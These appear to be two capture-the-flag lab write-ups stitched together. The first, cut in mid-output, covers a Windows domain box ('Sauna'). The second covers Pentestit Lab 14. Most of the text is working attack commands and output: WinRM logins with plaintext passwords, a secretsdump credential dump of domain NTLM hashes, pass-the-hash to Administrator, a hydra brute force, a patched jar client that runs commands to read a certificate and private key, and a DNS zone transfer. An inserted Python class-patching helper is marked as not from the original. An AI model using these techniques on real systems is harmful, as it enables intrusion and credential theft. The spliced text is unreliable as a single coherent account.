514: EGOTISTICALBANK\Domain Guests (SidTypeGroup)
515: EGOTISTICALBANK\Domain Computers (SidTypeGroup)
516: EGOTISTICALBANK\Domain Controllers (SidTypeGroup)
517: EGOTISTICALBANK\Cert Publishers (SidTypeAlias)
518: EGOTISTICALBANK\Schema Admins (SidTypeGroup)
519: EGOTISTICALBANK\Enterprise Admins (SidTypeGroup)
520: EGOTISTICALBANK\Group Policy Creator Owners (SidTypeGroup)
521: EGOTISTICALBANK\Read-only Domain Controllers (SidTypeGroup)
522: EGOTISTICALBANK\Cloneable Domain Controllers (SidTypeGroup)
525: EGOTISTICALBANK\Protected Users (SidTypeGroup)
526: EGOTISTICALBANK\Key Admins (SidTypeGroup)
527: EGOTISTICALBANK\Enterprise Key Admins (SidTypeGroup)
553: EGOTISTICALBANK\RAS and IAS Servers (SidTypeAlias)
571: EGOTISTICALBANK\Allowed RODC Password Replication Group (SidTypeAlias)
572: EGOTISTICALBANK\Denied RODC Password Replication Group (SidTypeAlias)
1000: EGOTISTICALBANK\SAUNA$ (SidTypeUser)
1101: EGOTISTICALBANK\DnsAdmins (SidTypeAlias)
1102: EGOTISTICALBANK\DnsUpdateProxy (SidTypeGroup)
1103: EGOTISTICALBANK\HSmith (SidTypeUser)
1105: EGOTISTICALBANK\FSmith (SidTypeUser)
1108: EGOTISTICALBANK\svc_loanmgr (SidTypeUser)


 root@kali:/opt/evil-winrm# ./evil-winrm.rb -i 10.10.10.175 --user fsmith -p Thestrokes23

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\FSmith\Documents> dir


    Directory: C:\Users\FSmith\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        3/20/2020   1:07 PM                PowerSploit-master
-a----        3/20/2020   1:18 PM          53760 SauronEye.exe
-a----        3/20/2020  12:58 PM           7120 WindowsEnum.ps1


  Windows Enumeration Script v 0.1
          by absolomb
       www.sploitspren.com
------------------------------------------


*Evil-WinRM* PS C:\Users\FSmith\Documents>

  User Directories
------------------------------------------

Name
----
Administrator
FSmith
Public
svc_loanmgr
  User Autologon Registry Items
------------------------------------------

DefaultDomainName DefaultUserName                 DefaultPassword
----------------- ---------------                 ---------------
EGOTISTICALBANK   EGOTISTICALBANK\svc_loanmanager Moneymakestheworldgoround!


root@kali:/opt/evil-winrm# evil-winrm -i 10.10.10.175 --user svc_loanmgr -p Moneymakestheworldgoround!

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents>


*Evil-WinRM* PS C:\Users\FSmith> gci -Recurse -Filter "user.txt" -File -ErrorAction SilentlyContinue -Path "C:\"


    Directory: C:\Users\FSmith\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        1/23/2020  10:03 AM             34 user.txt




*Evil-WinRM* PS C:\Users\svc_loanmgr\DOcuments> ./winPEAS.exe



root@kali:/opt/SharpSploit/SharpSploit# secretsdump.py EGOTISTICAL-BANK.LOCAL/svc_loanmgr:Moneymakestheworldgoround\!@10.10.10.175
Impacket v0.9.21.dev1+20200313.160519.0056b61c - Copyright 2020 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:f0b39206c3b064d1adc35f95e8a6e70c:::
[*] Kerberos keys grabbed


root@kali:/opt/evil-winrm# evil-winrm -i 10.10.10.175 -u Administrator -H d9485863c1e9e05851aa40cbb4ab9dff

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
egotisticalbank\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents>

Lab Pentestit 14 - writeup

  1. Crack password for mail
# cat logins_mail.txt
sidorov@test.lab
ivanov@test.lab 
petrov@test.lab 
support@test.lab


hydra -L logins_mail.txt -P /tmp/1 imap://192.168.101.14 -t 60 -f -I
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-02-12 17:45:04
[DATA] max 44 tasks per 1 server, overall 44 tasks, 44 login tries (l:4/p:11), ~1 try per task
[DATA] attacking imap://192.168.101.14:143/


[ERROR] IMAP LOGIN AUTH : 2 NO [AUTHENTICATIONFAILED] Authentication failed.


[143][imap] host: 192.168.101.14   login: support@test.lab password: PASSWORD
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-02-12 17:45:12


telnet 192.168.101.14 imap
Connected to 192.168.101.14.
Escape character is '^]'.
*
a1 LOGIN support@test.lab PASSWORD
a1 OK
^]
telnet> quit
Connection closed.






root@kali:~/ctf/pentestitlab14# unzip vpn.zip -d vpn
Archive:  vpn.zip
 extracting: vpn/user
  inflating: vpn/vpn.conf
root@kali:~/ctf/pentestitlab14# cd vpn
root@kali:~/ctf/pentestitlab14/vpn# ls
user  vpn.conf


  2. Connect to the new VPN

root@kali:~/ctf/pentestitlab14/vpn# openvpn --config vpn.conf
Wed Feb 12 18:18:42 2020 WARNING: file 'user' is group or others accessible
Wed Feb 12 18:18:42 2020 OpenVPN 2.4.7 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [LZ4] [EPOLL] [PKCS11] [MH/PKTINFO] [AEAD] built on Feb 20 2019
Wed Feb 12 18:18:42 2020 library versions: OpenSSL 1.1.1d  10 Sep 2019, LZO 2.10
Wed Feb 12 18:18:42 2020 WARNING: No server certificate verification method has been enabled.  See http://openvpn.net/howto.html#mitm for more info.
Wed Feb 12 18:18:42 2020 TCP/UDP: Preserving recently used remote address: [AF_INET]192.168.101.15:1194
Wed Feb 12 18:18:42 2020 Socket Buffers: R=[212992->212992] S=[212992->212992]
Wed Feb 12 18:18:42 2020 UDP link local (bound): [AF_INET][undef]:1194
Wed Feb 12 18:18:42 2020 UDP link remote: [AF_INET]192.168.101.15:1194
Wed Feb 12 18:18:42 2020 TLS: Initial packet from [AF_INET]192.168.101.15:1194, sid=6b57de4a c850dc54
Wed Feb 12 18:18:42 2020 WARNING: this configuration may cache passwords in memory -- use the auth-nocache option to prevent this
Wed Feb 12 18:18:42 2020 VERIFY OK: depth=1, C=RU, ST=Moscow, L=Moscow, O=test, OU=test, CN=test CA, name=EasyRSA, emailAddress=support@test.lab
Wed Feb 12 18:18:42 2020 VERIFY OK: depth=0, C=RU, ST=Moscow, L=Moscow, O=test, OU=test, CN=server, name=EasyRSA, emailAddress=support@test.lab
Wed Feb 12 18:18:42 2020 Control Channel: TLSv1.2, cipher TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, 2048 bit RSA
Wed Feb 12 18:18:42 2020 [server] Peer Connection Initiated with [AF_INET]192.168.101.15:1194
Wed Feb 12 18:18:43 2020 SENT CONTROL [server]: 'PUSH_REQUEST' (status=1)
Wed Feb 12 18:18:43 2020 PUSH: Received control message: 'PUSH_REPLY,route 172.16.0.0 255.255.0.0,route 10.11.0.1,topology net30,ifconfig 10.11.0.42 10.11.0.41,peer-id 9,cipher AES-256-GCM'
Wed Feb 12 18:18:43 2020 OPTIONS IMPORT: --ifconfig/up options modified
Wed Feb 12 18:18:43 2020 OPTIONS IMPORT: route options modified
Wed Feb 12 18:18:43 2020 OPTIONS IMPORT: peer-id set
Wed Feb 12 18:18:43 2020 OPTIONS IMPORT: adjusting link_mtu to 1625
Wed Feb 12 18:18:43 2020 OPTIONS IMPORT: data channel crypto options modified
Wed Feb 12 18:18:43 2020 Data Channel: using negotiated cipher 'AES-256-GCM'
Wed Feb 12 18:18:43 2020 Outgoing Data Channel: Cipher 'AES-256-GCM' initialized with 256 bit key
Wed Feb 12 18:18:43 2020 Incoming Data Channel: Cipher 'AES-256-GCM' initialized with 256 bit key
Wed Feb 12 18:18:43 2020 ROUTE_GATEWAY 192.168.51.1/255.255.255.0 IFACE=eth0 HWADDR=08:00:27:a0:58:f0
Wed Feb 12 18:18:43 2020 TUN/TAP device tun1 opened
Wed Feb 12 18:18:43 2020 TUN/TAP TX queue length set to 100
Wed Feb 12 18:18:43 2020 /sbin/ip link set dev tun1 up mtu 1500
Wed Feb 12 18:18:43 2020 /sbin/ip addr add dev tun1 local 10.11.0.42 peer 10.11.0.41
Wed Feb 12 18:18:44 2020 /sbin/ip route add 172.16.0.0/16 via 10.11.0.41
Wed Feb 12 18:18:44 2020 /sbin/ip route add 10.11.0.1/32 via 10.11.0.41
Wed Feb 12 18:18:44 2020 Initialization Sequence Completed


We have new subnet - 172.16.0.0/16


  3. Scan 172.16.0.0/16 (masscan, nmap)

nmap -T5 -n -sn 172.16.0.0/24
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-13 09:32 CET
Nmap scan report for 172.16.0.11
Host is up (0.071s latency).
Nmap done: 256 IP addresses (1 host up) scanned in 34.57 seconds

The ping sweep reports only 172.16.0.11, but a TCP port scan of the same /24 also turns up two hosts the sweep missed: 172.16.0.20, a domain controller (Kerberos 88/464, LDAP 389/636, global catalog 3268/3269, SMB 139/445), and 172.16.0.10, which exposes DNS only.

Nmap scan report for 172.16.0.20
Host is up (0.052s latency).
Not shown: 850 filtered ports, 139 closed ports
PORT     STATE SERVICE
53/tcp   open domain
88/tcp   open kerberos-sec
135/tcp  open msrpc
139/tcp  open netbios-ssn
389/tcp  open ldap
445/tcp  open microsoft-ds
464/tcp  open kpasswd5
636/tcp  open ldapssl
1024/tcp open  kdm
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl


Nmap scan report for 172.16.0.10
Host is up (0.052s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE
53/tcp open  domain


  1. client.jar

Run as shipped, the client prints a single line that looks like df output from the remote side: the client sends a command string that the server executes and returns.

root@kali  ~/ctf/pentestitlab14  java -jar client.jar
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
/dev/sda1        15G 2.0G 13G 14% /


  1. edit client.jar

jar -xf client.jar

Main.class was edited outside the VM (the modified copy comes back in through the VirtualBox shared folder /media/sf_E_DRIVE), written back into the jar with jar uf, and the client re-run:

root@kali  ~/ctf/pentestitlab14/client-jar  cd ..
root@kali  ~/ctf/pentestitlab14  cp /media/sf_E_DRIVE/Downloads/client-jar/ . -r
root@kali  ~/ctf/pentestitlab14  cd -
~/ctf/pentestitlab14/client-jar
root@kali  ~/ctf/pentestitlab14/client-jar  jar uf client.jar lab/test/client/Main.class
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
root@kali  ~/ctf/pentestitlab14/client-jar  java -jar client.jar





one liner:


root@kali  ~/ctf/pentestitlab14/client-jar  cd .. && cp /media/sf_E_DRIVE/Downloads/client-jar/ . -r && cd client-jar && jar uf client.jar lab/test/client/Main.class && java -jar client.jar
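The same edit can be done without an assembler: the command the client sends is a CONSTANT_Utf8 entry in the class file's constant pool, referenced by index from the ldc instruction, so rewriting that one entry (tag, u2 length, bytes) is enough and every other index in the file stays valid. The following is an added example in Python, not code from the original writeup. It assumes the original constant was "df -h" (inferred from the client's output; the page does not show it) and builds a constructed, non-loadable class-file stub purely to exercise the pool walker.

```python
import struct

# Constant-pool entry sizes after the 1-byte tag (JVM spec 4.4); tag 1 (Utf8) is variable-length
_FIXED_SIZE = {3: 4, 4: 4, 5: 8, 6: 8, 7: 2, 8: 2, 9: 4, 10: 4, 11: 4,
               12: 4, 15: 3, 16: 2, 17: 4, 18: 4, 19: 2, 20: 2}
CONSTANT_UTF8 = 1
CONSTANT_STRING = 8


def constant_pool(data):
    """Walk the constant pool of a .class file.
    Returns a list of (index, tag, start_offset, end_offset, utf8_value_or_None)."""
    magic, _minor, _major, count = struct.unpack_from(">IHHH", data, 0)
    if magic != 0xCAFEBABE:
        raise ValueError("not a class file")
    entries, off, idx = [], 10, 1
    while idx < count:
        tag = data[off]
        if tag == CONSTANT_UTF8:
            (length,) = struct.unpack_from(">H", data, off + 1)
            end = off + 3 + length
            # The JVM's "modified UTF-8" equals UTF-8 for ASCII, which is all a shell command needs
            value = data[off + 3:end].decode("utf-8", errors="replace")
        elif tag in _FIXED_SIZE:
            end, value = off + 1 + _FIXED_SIZE[tag], None
        else:
            raise ValueError(f"unknown constant tag {tag} at offset {off}")
        entries.append((idx, tag, off, end, value))
        off = end
        idx += 2 if tag in (5, 6) else 1  # Long and Double occupy two pool slots
    return entries


def utf8_constants(data):
    """All string constants in pool order; handy for spotting the command string in a real jar."""
    return [v for _, t, _, _, v in constant_pool(data) if t == CONSTANT_UTF8]


def replace_utf8_constant(data, old, new):
    """Return a copy of the class file with the CONSTANT_Utf8 entry `old` rewritten to `new`.
    Only that entry's length field and bytes change. Pool entries are addressed by index,
    not by byte offset, so CONSTANT_String, method code and attributes stay consistent."""
    encoded = new.encode("ascii")  # ASCII only, so modified UTF-8 == UTF-8
    if len(encoded) > 0xFFFF:
        raise ValueError("constant too long for a u2 length")
    for _, tag, start, end, value in constant_pool(data):
        if tag == CONSTANT_UTF8 and value == old:
            return (data[:start] + bytes([CONSTANT_UTF8]) + struct.pack(">H", len(encoded))
                    + encoded + data[end:])
    raise ValueError(f"constant {old!r} not found")


def build_sample_class(command):
    """Constructed, minimal class-file prefix for testing: a 3-entry pool holding the command
    string, a CONSTANT_String pointing at it (as ldc would use) and a class name, followed by
    an opaque tail. It is NOT a loadable class; it only exercises the pool walker."""
    def utf8(s):
        b = s.encode("ascii")
        return bytes([CONSTANT_UTF8]) + struct.pack(">H", len(b)) + b
    pool = (utf8(command)
            + bytes([CONSTANT_STRING]) + struct.pack(">H", 1)
            + utf8("lab/test/client/Main"))
    tail = bytes.fromhex("0021000400050000")  # access_flags, this_class, super_class ... (opaque)
    return struct.pack(">IHHH", 0xCAFEBABE, 0, 52, 4) + pool + tail


if __name__ == "__main__":
    stub = build_sample_class("df -h")
    print(utf8_constants(stub))
    patched = replace_utf8_constant(stub, "df -h", "cat /opt/token")
    print(utf8_constants(patched))
```

Against the real jar, read lab/test/client/Main.class from the extracted tree, call replace_utf8_constant on its bytes, write the result back and update the jar with jar uf exactly as above. The ASCII restriction is deliberate: commands with non-ASCII characters would need the JVM's modified UTF-8 encoding, which this helper does not implement.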




ldc "ls -al /home/dev/.crt;cat /home/dev/.crt/dev.crt;echo -e "\n\n\n\n"; cat /home/dev/.crt/dev.key;"


drwxr-xr-x 2 root root 4096 Nov 14 18:44 .
drwxr-xr-x 3 dev  dev 4096 Nov 14 18:42 ..
-rw-r--r-- 1 root root 5358 Nov 14 18:43 dev.crt
-rw-r--r-- 1 root root 1705 Nov 14 18:43 dev.key
Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number: 3 (0x3)
    Signature Algorithm: sha256WithRSAEncryption
        Issuer: C=RU, ST=Moscow, L=Moscow, O=test, OU=test, CN=test CA/name=EasyRSA/emailAddress=support@test.lab
        Validity
            Not Before: Nov 14 07:50:50 2019 GMT
            Not After : Nov 11 07:50:50 2029 GMT
        Subject: C=RU, ST=Moscow, L=Moscow, O=test, OU=test, CN=dev/name=EasyRSA/emailAddress=support@test.lab
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                Public-Key: (2048 bit)
                Modulus:
                    00:ae:dc:b6:2b:c2:31:3e:e6:e7:de:88:e7:c6:a2:
                    1b:d2:9a:a1:8f:dd:8d:07:03:ad:24:f9:85:d0:dd:
                    5b:de:96:2f:95:66:b3:cc:25:b5:c6:f1:7f:ec:66:
                    d8:c7:84:e2:f0:db:6e:4a:8f:ee:b7:f2:c2:6e:cf:
                    f6:13:eb:a9:ba:2c:58:a3:1e:1f:ab:6b:4a:ec:39:
                    be:be:b8:3c:67:b2:24:cd:7a:49:fd:00:59:f5:9d:
                    b8:14:cc:e7:47:ae:ce:03:18:92:21:1d:6f:31:04:
                    aa:9e:aa:7e:76:99:b4:40:53:33:9f:67:f2:66:7f:
                    e7:f9:22:2f:c7:3b:8e:3a:08:0c:d7:7b:39:20:e0:
                    33:38:65:20:91:4c:2b:eb:b3:d4:9b:dd:06:05:90:
                    ae:47:6b:91:55:2b:9e:06:58:de:62:68:92:d8:94:
                    2c:f7:61:a1:f6:22:c9:4a:7c:dd:06:bf:fb:0d:b3:
                    1d:2d:1c:a4:ea:8e:70:28:bd:be:d3:43:23:6f:ba:
                    dc:94:db:da:82:52:58:fb:36:45:06:c2:c4:37:c5:
                    e6:c8:73:a5:3d:2f:a6:11:d4:d6:19:29:65:99:8b:
                    5b:87:e1:51:b0:f6:12:8a:d0:02:84:45:13:85:69:
                    22:ed:07:44:3c:a7:6b:91:32:a2:4f:2b:9e:79:83:
                    46:b3
                Exponent: 65537 (0x10001)
        X509v3 extensions:
            X509v3 Basic Constraints: 
                CA:FALSE
            Netscape Comment: 
                Easy-RSA Generated Certificate
            X509v3 Subject Key Identifier: 
                51:51:D9:D1:8E:E2:36:87:DE:62:E3:98:68:7D:68:DB:E3:AB:35:87
            X509v3 Authority Key Identifier: 
                keyid:61:14:9C:EE:28:7B:A5:2D:69:B6:AB:34:C9:9B:87:73:07:49:20:69
                DirName:/C=RU/ST=Moscow/L=Moscow/O=test/OU=test/CN=test CA/name=EasyRSA/emailAddress=support@test.lab
                serial:F5:C2:6A:50:05:37:8F:F8


            X509v3 Extended Key Usage: 
                TLS Web Client Authentication
            X509v3 Key Usage: 
                Digital Signature
            X509v3 Subject Alternative Name: 
                DNS:dev
    Signature Algorithm: sha256WithRSAEncryption
         86:02:4e:d1:25:78:1f:a9:8a:f9:c9:52:7c:4b:92:e4:59:bf:
         33:37:86:54:cc:0a:54:a5:5b:8c:70:ba:9d:92:12:24:f8:aa:
         80:7a:f0:4b:9a:c1:d1:93:95:c9:72:04:96:d3:8e:30:3d:26:
         53:d8:12:e7:31:9a:71:a1:29:31:8b:83:21:fa:fe:e9:93:9b:
         af:6c:e4:6f:93:03:ba:a2:8b:53:0f:4d:d9:3b:af:c1:75:36:
         3f:3f:1f:28:28:9f:36:37:a3:f2:b8:d7:89:bd:f5:6d:f8:cf:
         7a:ac:2f:88:22:6e:9e:00:30:14:db:c6:2f:1b:54:bd:5e:9a:
         f5:46:7e:ca:e3:2e:54:f8:29:fd:67:38:9b:14:30:c6:e3:b6:
         de:6d:a4:5d:51:84:ec:48:19:7e:40:1f:56:4e:46:52:10:23:
         17:57:1c:f0:ce:96:70:9a:f8:e7:7b:51:00:d4:98:ce:09:16:
         d7:4b:72:7f:38:aa:ae:42:10:4b:4f:c3:f9:bc:8a:92:03:42:
         7b:1f:7c:8c:5e:3c:78:9a:f7:4c:f6:67:47:74:fb:8c:6f:75:
         31:8e:e5:43:14:7f:50:9e:c0:4f:fe:d4:ef:d0:44:3c:e5:f2:
         f5:46:e8:e9:da:92:b9:f2:d2:42:97:7c:05:b2:22:5d:0b:3b:
         71:3d:d0:a0
-----BEGIN CERTIFICATE-----
MIIE+DCCA+CgAwIBAgIBAzANBgkqhkiG9w0BAQsFADCBkjELMAkGA1UEBhMCUlUx
DzANBgNVBAgTBk1vc2NvdzEPMA0GA1UEBxMGTW9zY293MQ0wCwYDVQQKEwR0ZXN0
MQ0wCwYDVQQLEwR0ZXN0MRAwDgYDVQQDEwd0ZXN0IENBMRAwDgYDVQQpEwdFYXN5
UlNBMR8wHQYJKoZIhvcNAQkBFhBzdXBwb3J0QHRlc3QubGFiMB4XDTE5MTExNDA3
NTA1MFoXDTI5MTExMTA3NTA1MFowgY4xCzAJBgNVBAYTAlJVMQ8wDQYDVQQIEwZN
b3Njb3cxDzANBgNVBAcTBk1vc2NvdzENMAsGA1UEChMEdGVzdDENMAsGA1UECxME
dGVzdDEMMAoGA1UEAxMDZGV2MRAwDgYDVQQpEwdFYXN5UlNBMR8wHQYJKoZIhvcN
AQkBFhBzdXBwb3J0QHRlc3QubGFiMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIB
CgKCAQEArty2K8IxPubn3ojnxqIb0pqhj92NBwOtJPmF0N1b3pYvlWazzCW1xvF/
7GbYx4Ti8NtuSo/ut/LCbs/2E+upuixYox4fq2tK7Dm+vrg8Z7IkzXpJ/QBZ9Z24
FMznR67OAxiSIR1vMQSqnqp+dpm0QFMzn2fyZn/n+SIvxzuOOggM13s5IOAzOGUg
kUwr67PUm90GBZCuR2uRVSueBljeYmiS2JQs92Gh9iLJSnzdBr/7DbMdLRyk6o5w
KL2+00Mjb7rclNvaglJY+zZFBsLEN8XmyHOlPS+mEdTWGSllmYtbh+FRsPYSitAC
hEUThWki7QdEPKdrkTKiTyueeYNGswIDAQABo4IBWTCCAVUwCQYDVR0TBAIwADAt
BglghkgBhvhCAQ0EIBYeRWFzeS1SU0EgR2VuZXJhdGVkIENlcnRpZmljYXRlMB0G
A1UdDgQWBBRRUdnRjuI2h95i45hofWjb46s1hzCBxwYDVR0jBIG/MIG8gBRhFJzu
KHulLWm2qzTJm4dzB0kgaaGBmKSBlTCBkjELMAkGA1UEBhMCUlUxDzANBgNVBAgT
Bk1vc2NvdzEPMA0GA1UEBxMGTW9zY293MQ0wCwYDVQQKEwR0ZXN0MQ0wCwYDVQQL
EwR0ZXN0MRAwDgYDVQQDEwd0ZXN0IENBMRAwDgYDVQQpEwdFYXN5UlNBMR8wHQYJ
KoZIhvcNAQkBFhBzdXBwb3J0QHRlc3QubGFiggkA9cJqUAU3j/gwEwYDVR0lBAww
CgYIKwYBBQUHAwIwCwYDVR0PBAQDAgeAMA4GA1UdEQQHMAWCA2RldjANBgkqhkiG
9w0BAQsFAAOCAQEAhgJO0SV4H6mK+clSfEuS5Fm/MzeGVMwKVKVbjHC6nZISJPiq
gHrwS5rB0ZOVyXIEltOOMD0mU9gS5zGacaEpMYuDIfr+6ZObr2zkb5MDuqKLUw9N
2TuvwXU2Pz8fKCifNjej8rjXib31bfjPeqwviCJungAwFNvGLxtUvV6a9UZ+yuMu
VPgp/Wc4mxQwxuO23m2kXVGE7EgZfkAfVk5GUhAjF1cc8M6WcJr453tRANSYzgkW
10tyfziqrkIQS0/D+byKkgNCex98jF48eJr3TPZnR3T7jG91MY7lQxR/UJ7AT/7U
79BEPOXy9Ubo6dqSufLSQpd8BbIiXQs7cT3QoA==
-----END CERTIFICATE-----




-----BEGIN PRIVATE KEY-----
MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQCu3LYrwjE+5ufe
iOfGohvSmqGP3Y0HA60k+YXQ3Vveli+VZrPMJbXG8X/sZtjHhOLw225Kj+638sJu
z/YT66m6LFijHh+ra0rsOb6+uDxnsiTNekn9AFn1nbgUzOdHrs4DGJIhHW8xBKqe
qn52mbRAUzOfZ/Jmf+f5Ii/HO446CAzXezkg4DM4ZSCRTCvrs9Sb3QYFkK5Ha5FV
K54GWN5iaJLYlCz3YaH2IslKfN0Gv/sNsx0tHKTqjnAovb7TQyNvutyU29qCUlj7
NkUGwsQ3xebIc6U9L6YR1NYZKWWZi1uH4VGw9hKK0AKERROFaSLtB0Q8p2uRMqJP
K555g0azAgMBAAECggEAV6ofSmDY/4gTxuUsDdFH0ZXkWZPhGBsnutm91LClVjpF
MMmEalydfVeloocNNznP7KCV8pumOmJiR9vKqsIDHWsOJPj9N5tavINWtZb38aTF
/p3Iaia68wBXQVZYvP9OGQ9Ac4mmLRUB1Pn03NDCJV2RC+G5DNojGiuheGjLLRv3
2e9inBCF4PSktL4E9u7/2hr5xba2z0aVt47vkxe6Q+InfAHzaGO5S4wao4T4RXZp
CKgITg+9/VBQrHHaKqqwM9l/XZA68svNvD3P00krI9Jn6kriQPK0NKx/n/KyVixV
uG6ij5+tWrvHNihofGR7LoJ8wWMenO0QoMjgoNblQQKBgQDZkIS9udncO2HIB5/n
y2JIB89Ep6PtD1iYLhHInCpuIrYWvktk36GVLCe2TG2/6bqmJyFzM5uv0cnwbCHx
PYFods1/mA80K5p7n4lhviqgeogbC/PbIA4RGYW5JxTDk82LcIs4qg5n27lW+nY6
F7RkOVObXoIvZ5iitHTRjTo4pwKBgQDNwPQj7ER4Yxge7oF+HorXnkEWUiPiRV8K
3qJZS3T1DSxhkDTW+NcJnZ7GE7EGN+V9zFGUHFjoh0vmrFHzIub7n2eClNTvnkko
Z/1T2QLdg4pfnW+MMAqqas78b4m88X5j6C3OvXWvFzzNbqJKxi38M3CAgiS8gUZd
/h9yJ0F3FQKBgQC3lytciqNcI8P8rupyCH9z9xshfTFoTwXczSt2lMl9TM9JW+V1
Rv0sSylrvQzz4ID/yo+AjjE3aZm1xxnRX6x/AZmhrShPRuhCn7qnf3irGRsXb7uk
0mTsaxQbzO3JqETQAPWKqH4liBXbXtk7Zlt0I6f4uQS0igAUdKELX9iciwKBgGyT
nkI2tAszf88S3ZLIW0xdXsuAnR8SrIz334RvpVCLmxgBGWE3/4I7g0XTrl8xsBEq
eQJH00Mh4pPf6376tBmkjOMD1zp7tO91sOFGa5SpjaPXWL4JvBciNghQc8cZSTE/
nKy0nh2/jX57G3mKC0pDeuLVyr0PGysOp1l+DbXhAoGBANNm56+tofNITKiXCdTH
/ZSEuabW2mFxAs2U8HUlwgxv3fc4Uy8JuS+JBpOZ1vuAKLJbkZJiEgk/xTQa3J8i
OfpPfY0tkSzlVe8VWSvvFlS2LoeUBtsdtHlecTTUkFStbmQbYrKX7ATl1xZlcNey
i70HDndxU49PRN/6rMuSTzMK
-----END PRIVATE KEY-----


The certificate is a client-authentication certificate (X509v3 Extended Key Usage: TLS Web Client Authentication, CN=dev) from the lab's EasyRSA CA (CN=test CA), the same PKI the VPN server certificate above belongs to judging by the identical O/OU/emailAddress, so the pair is saved as OpenVPN client credentials. The key gets mode 600 so OpenVPN does not warn about a group- or world-readable key file:

root@kali  ~/ctf/pentestitlab14/client-jar  vim dev.crt.172.16.20.2
root@kali  ~/ctf/pentestitlab14/client-jar  vim dev.key.172.16.20.2
root@kali  ~/ctf/pentestitlab14/client-jar  chmod 600 dev.key.172.16.20.2


cat /opt/token 
L0* Dws7m|b;ek


  1. 172.16.0.11



root@kali  ~/ctf/pentestitlab14  curl http://172.16.0.11/token
#trfioefjio


  1. DNS

root@kali  ~/ctf/pentestitlab14/client-jar  dig axfr @172.16.0.20 test.lab.

; <<>> DiG 9.11.14-3-Debian <<>> axfr @172.16.0.20 test.lab.
; (1 server found)
;; global options: +cmd
test.lab.                3600  IN  SOA  ad1.test.lab. hostmaster.test.lab. 1 900 600 86400 3600
; Transfer failed.

The DC refuses the zone transfer, but the secondary name server (ns2, 172.16.0.10) hands out the whole test.lab zone. That exposes two segments not yet scanned (172.16.40.0/24 and 172.16.50.0/24) and a host name that is itself a token:

root@kali  ~/ctf/pentestitlab14/client-jar  dig axfr @172.16.0.10 test.lab.

; <<>> DiG 9.11.14-3-Debian <<>> axfr @172.16.0.10 test.lab.
; (1 server found)
;; global options: +cmd
test.lab.                           21600  IN  SOA  test.lab. ns1.test.lab. 117 5 30 21600 60
test.lab.                           21600  IN  NS   ns1.test.lab.
test.lab.                           21600  IN  NS   ns2.test.lab.
test.lab.                           21600  IN  A    172.16.0.20
test.lab.                           21600  IN  A    172.16.50.20
_kerberos._tcp.dc._msdcs.test.lab.  21600  IN  SRV  0 0 88 test.lab.
_ldap._tcp.dc._msdcs.test.lab.      21600  IN  SRV  0 0 389 test.lab.
gc._msdcs.test.lab.                 21600  IN  A    172.16.50.20
_ldap._tcp.gc._msdcs.test.lab.      21600  IN  SRV  0 0 3268 test.lab.
_kerberos._tcp.test.lab.            21600  IN  SRV  0 0 88 test.lab.
_kpasswd._tcp.test.lab.             21600  IN  SRV  0 0 464 test.lab.
_ldap._tcp.test.lab.                21600  IN  SRV  0 0 389 test.lab.
_kerberos._udp.test.lab.            21600  IN  SRV  0 0 88 test.lab.
_kpasswd._udp.test.lab.             21600  IN  SRV  0 0 464 test.lab.
admin.test.lab.                     21600  IN  A    172.16.40.3
dc.test.lab.                        21600  IN  A    172.16.50.20
dc1.test.lab.                       21600  IN  A    172.16.50.20
dc2.test.lab.                       21600  IN  A    172.16.0.20
dns.test.lab.                       21600  IN  A    172.16.0.10
dns.test.lab.                       21600  IN  A    172.16.50.10
elastic.test.lab.                   21600  IN  A    172.16.40.6
_ldap._tcp.ForestDnsZones.test.lab. 21600  IN  SRV  0 0 389 test.lab.
git.test.lab.                       21600  IN  A    172.16.0.21
mail.test.lab.                      21600  IN  A    172.16.50.3
news.test.lab.                      21600  IN  A    172.16.50.21
ns1.test.lab.                       21600  IN  A    172.16.50.10
ns2.test.lab.                       21600  IN  A    172.16.0.10
site.test.lab.                      21600  IN  A    172.16.50.2
token-SDS34gs93.test.lab.           21600  IN  A    127.0.0.1      <- new token :) (ns)
vpn-1.test.lab.                     21600  IN  A    172.16.50.11
vpn-2.test.lab.                     21600  IN  A    172.16.0.11
test.lab.                           21600  IN  SOA  test.lab. ns1.test.lab. 117 5 30 21600 60
